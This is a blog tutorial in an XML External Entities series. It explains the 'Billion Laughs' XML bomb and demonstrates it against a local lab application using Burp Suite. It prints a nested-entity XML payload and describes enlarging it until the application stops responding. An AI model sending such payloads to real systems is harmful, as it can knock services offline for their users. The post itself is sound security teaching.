Thursday, August 1, 2019

XML External Entities - Billion Laughter Attack - Part IV

XXE Attack -


Hi Techmates, this blog is all about the famous Billion Laughter Attack. In this blog, we will discuss what this attack is and how this attack can lead to a Denial of Service (DOS) attack with a practical demonstration. 

What is Billion Laughter Attack?

Billion Laughter Attack is a type of Denial of Service (DOS) Attack that targets XML parsers. The Billion Laughter Attack is also known as an XML bomb. A Billion Laughs Attack can occur even when using well-formed XML and can also pass XML schema validation.


For Example:
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>


In the above example, there are five different XML Entities i.e., lol, lol2, lol3, lol4, lol5. The variable “lol” contains the value “lol”. Likewise, the variable “lol2” contains the value of “lol”*4 times and the same goes till “lol5”. The document content section of this XML file contains a reference to only one instance of the entity lol5. However, when this is being parsed by the parser - lol5 is encountered, it is expanded into 4 lol4s, each of which is expanded into 4 lol3s, and so on and so forth. By the time everything is expanded to the text lol, there are many instances of the string "lol". Thus if the instance could encounter Billion “lol”s, hence the name of the attack. This many expansion consumes an exponential amount of resources and time, causing the DOS.

Demo

For demo purpose, we will be using the same application that was used in XML External Entities - Inband - Part II. If you haven’t already set up / downloaded please visit XML External Entities - Inband - Part II for setup.


Step 1: Navigate to http://localhost/xxelab/penlab/ and fill all the details as shown in Exhibit 1.

Exhibit 1

Step 2: Intercept the request using a proxy tool such as Burpsuite as shown in Exhibit 2.


Exhibit 2

Step 3: Enter the XML Code in the Burpsuite as shown in Exhibit 3. It can be observed that the application responds with “lollol……” as expected.


Exhibit 3

Step 4: Add more XML Entity to perform a DOS Attack as shown in Exhibit 4. 


Exhibit 4

Bingo!!! It can be observed that the application does not respond.


I hope you guys liked this blog. If you have any queries please leave the comment below. Like and Share. Go through the XML External Entities - SSRF - Part V to know how you can perform SSRF through XXE.


References

https://www.thesecuritybuddy.com/dos-ddos-prevention/what-is-billion-laughs-attack/